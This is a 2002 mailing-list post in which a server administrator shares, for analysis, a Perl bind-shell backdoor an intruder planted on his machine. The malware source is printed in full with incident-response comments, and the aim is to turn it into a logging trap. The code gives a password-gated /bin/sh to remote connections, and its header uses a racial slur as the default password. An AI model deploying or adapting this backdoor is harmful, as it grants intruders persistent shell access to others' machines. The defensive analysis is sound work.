On Thu, 3 Jan 2002, Michael O'Donnell wrote:
> > Also, if there's a perl/networking guru, I'm looking to re-write
> > the trojan to look like it's working, but instead be logging the
> > intruder's actions, IP, etc. It's a simple backdoor (only about 2.5
> > pages printed), so I might even be able to figure it out myself...
>
>
> Post a copy of the original here, please - it sounds interesting.
Ok... It's pasted below. I have not edited it at all from the way it
was put on my server.
=============CUT HERE===================
#!/usr/bin/perl -w
#
# Division7 d00r...backdoor coded in perl
# by pHrail
#
# To make the password do
# perl -e 'print crypt("YOUR_PASS","2_CHAR_SALT");'
# Default is perl -e 'print crypt("nigger","d7");'
# ./bindme.pl 999 &
# $ nc localhost 999
# Password :
# nigger
# (pHrail@DIVISION7:/home/pHrail)
# uid=500(pHrail) gid=544(pHrail) groups=544(pHrail)
use Socket;
use strict;
# Analyst annotations (incident-response view). The code below is unchanged
# from the sample as posted; only comments were added.
# Summary: password-gated TCP bind shell. It listens on a port, asks for a
# password, and on a match gives the connection an interactive /bin/sh running
# as whatever account started the script. The script writes no log of any kind.
#Define your encrypted password here
# 13-character traditional crypt() hash with the two-character salt "d7". The
# salt matches the default named in the file header, so this is presumably the
# kit's unchanged default hash -- verify. Either way, the literal string is a
# usable indicator when searching other hosts for copies of this file.
my $crypt_pass = "d79hW9urgf/wI";
# Number of command-line arguments (array evaluated in scalar context).
my $argsnum = @ARGV;
# Listening port: first argument, else 999. A TCP listener on 999 owned by a
# perl process is the default network indicator for this sample.
my $port = $ARGV[0];
$port = 999 unless $port;
my $proto = getprotobyname('tcp');
# Shell command run after a successful login: prints a user@host:cwd banner,
# runs id, then starts an interactive /bin/sh.
# NOTE(review): the line after this assignment ("system specify path ...") is
# the tail of the trailing comment, wrapped by the mail client. As pasted it
# will most likely not compile; it is left untouched to preserve the sample.
my $system = 'echo "(`whoami`@`uname -n`:`pwd`)";id ; /bin/sh'; #if /bin/sh isn't on
system specify path to a real shell
# Prompt and rejection text; both are emitted by shelling out to echo.
my $passask = 'echo "Password :"';
my $nuhuh = 'echo "Nuh Uh Biatch, bye bye"';
# Argument check: a count below zero cannot occur, so in practice this only
# rejects an invocation with more than one argument.
if ($argsnum < 0 || $argsnum > 1) {
&usage();
exit;
}
# Plain TCP listener bound to INADDR_ANY, i.e. every interface on the host.
# SO_REUSEADDR is set before bind so the port can be reused without waiting.
socket(SERVER, PF_INET, SOCK_STREAM, $proto)
or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))
or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY))
or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
# Serve one connection at a time; CLIENT is closed at the end of each pass.
# $paddr receives the peer's packed address from accept() but is never decoded
# or recorded. A logging trap would unpack it at this point (sockaddr_in /
# inet_ntoa from the Socket module the file already loads).
for(; my $paddr = accept(CLIENT, SERVER); close CLIENT) {
# Point the process's stdin/stdout/stderr at the socket so that every command
# launched with system() talks directly to the remote peer. The open() return
# values are not checked.
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
system($passask);
# At file scope shift operates on @ARGV, so this consumes the port argument;
# the value is then overwritten by recv() on the next line.
my $password = shift;
# Read at most 9 bytes from the peer, then drop the final character
# (presumably the newline sent by the client).
recv CLIENT,$password,9,0;
chop($password);
# Hash the input with the stored salt and compare with the stored hash. The
# comparison is a regex match (=~), not string equality (eq), so the computed
# hash is interpreted as a pattern rather than compared literally.
if($crypt_pass =~ crypt($password,substr($crypt_pass,0,2))) {
# fork() returns the child's PID in the parent, so it is the ORIGINAL process
# that runs the shell and then exits; the child falls through to the close
# calls below and carries on as the listener. For triage: expect the
# listener's PID to change after each successful login, and expect a /bin/sh
# whose file descriptors 0-2 are the socket while a session is live.
if (fork()) {
system($system);
exit(0);
}
} else {
# Wrong password: send the rejection text. The connection itself is closed by
# the loop's "close CLIENT" step.
system($nuhuh);
}
# Detach the standard handles from this client before the next accept().
close(STDIN);
close(STDOUT);
close(STDERR);
}
# usage: print the tool banner, the invocation syntax, the default port and
# the platform name ($^O), then run date(1). The only call site in this file
# is the argument-count check, so it runs when more than one argument is
# given. The banner string is another static indicator for locating copies
# of this file on disk.
sub usage {
print "Division7 Door By pHrail\n";
print "Usage $0 <port to listen on> &\n";
print "Listens on default port 999\n";
print "OS: $^O\n";
# Shells out for the current date; output goes to the caller's terminal.
system('date');
}
=========CUT HERE ==========================
If anyone wants to make this into a trap for the cracker, let me know
and I'll test it.
Brian
---------------------------------------------------------------
| [EMAIL PROTECTED] Spam me and DIE! |
| http://www.datasquire.net |
| Co-Founder & Co-Owner of |
| Data Squire Internet Services |
---------------------------------------------------------------